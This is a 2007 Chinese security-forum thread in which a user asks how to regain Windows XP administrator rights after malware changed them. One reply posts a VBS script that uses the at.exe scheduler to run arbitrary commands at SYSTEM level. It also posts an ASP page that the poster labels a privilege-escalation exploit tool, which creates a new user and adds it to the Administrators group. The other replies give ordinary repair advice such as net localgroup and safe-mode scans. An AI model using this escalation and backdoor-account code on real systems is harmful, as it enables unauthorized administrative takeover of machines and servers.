12
返回列表 发新帖
楼主: dukudanxiao
收起左侧

[已解决] 求助 怎样恢复被修改的XP管理员权限?是被木马或说是病毒修改的

 关闭 [复制链接]
毒霸
发表于 2007-12-1 18:38:27 | 显示全部楼层
我的方法:
①提Administrators到System级别的vbs
程序代码:
  1. On Error Resume Next
  2. createobject("wscript.shell").run "at.exe " & hour(now) & ":"
  3. & minute(now)+"1" & " /interactive " & inputbox("请输入需要执行的命令"),0
  4. msgbox "启动完成...请等待"
复制代码


说明一下:需要at服务始终启动的...如果没启动,在on error Resume Next后加:
程序代码:
  1. set atsrv = GetObject("WinNT://./schedule")
  2. if atsrv.Status=1 then atsrv.start
复制代码


你在安全模式下用administrator登陆
再新建一个管理员账户就可以了
③在user权限下成功添加Administrators组的用户
代码是对的,但是很少能成功,具体的看运气了。。
  1. <head>.network对象脚本权限提升漏洞利用工具</head>
  2. <form action="useradd.asp" method=post>
  3. 用户:<input name="username" type="text" value="kevin1986"><br>
  4. 密码:<input name="passwd" type="password"><br>
  5. <input type="submit" Value="添 加">
  6. </form>

  7. <%@codepage=936%>
  8. <%on error resume next
  9. if request.servervariables("REMOTE_ADDR")<>"127.0.0.1" then
  10. response.write "iP !s n0T RiGHt"
  11. else
  12. if request("username")<>"" then
  13. username=request("username")
  14. passwd=request("passwd")
  15. Response.Expires=0
  16. Session.TimeOut=50
  17. Server.ScriptTimeout=3000
  18. set lp=Server.CreateObject("WSCRIPT.NETWORK")
  19. oz="WinNT://"&lp.ComputerName
  20. Set ob=GetObject(oz)
  21. Set oe=GetObject(oz&"/Administrators,group")
  22. Set od=ob.Create("user",username)
  23. od.SetPassword passwd
  24. od.SetInfo
  25. oe.Add oz&"/"&username
  26. if err then
  27. response.write "哎~~今天你还是别买6+1了……省下2元钱买瓶可乐也好……"
  28. else
  29. if instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user "&username.stdout.readall),"上次登录")>0 then
  30. response.write "虽然没有错误,但是好象也没建立成功.你一定很郁闷吧"
  31. else
  32. Response.write "OMG!"&username&"帐号居然成了!这可是未知漏洞啊.5,000,000RMB是你的了"
  33. end if
  34. end if
  35. else
  36. response.write "请输入输入用户名"
  37. end if
  38. end if
  39. %>
复制代码

[ 本帖最后由 毒霸 于 2007-12-1 18:40 编辑 ]
dukudanxiao
 楼主| 发表于 2007-12-1 19:10:08 | 显示全部楼层

回复 11楼 毒霸 的帖子

怎么执行``?
在安全模式里生成.REG还是.BAT``
我现在除了能在安全模式里操作``
其他就算在管理员用户下也不能操作``
magicx
发表于 2007-12-1 20:45:25 | 显示全部楼层
试试新建另外一个管理员权限的用户,然后在安全模式下查杀,也可以试试用avg辅杀~~~~
aiping
头像被屏蔽
发表于 2007-12-2 16:28:02 | 显示全部楼层
开始-程序-附件-命令提示符:
net   localgroup   administrators   Administrator   a   /add
注意中间空格!
毒霸
发表于 2007-12-2 17:18:09 | 显示全部楼层
楼主没看明白?我说的很清楚啊。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-26 04:20 , Processed in 0.085822 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表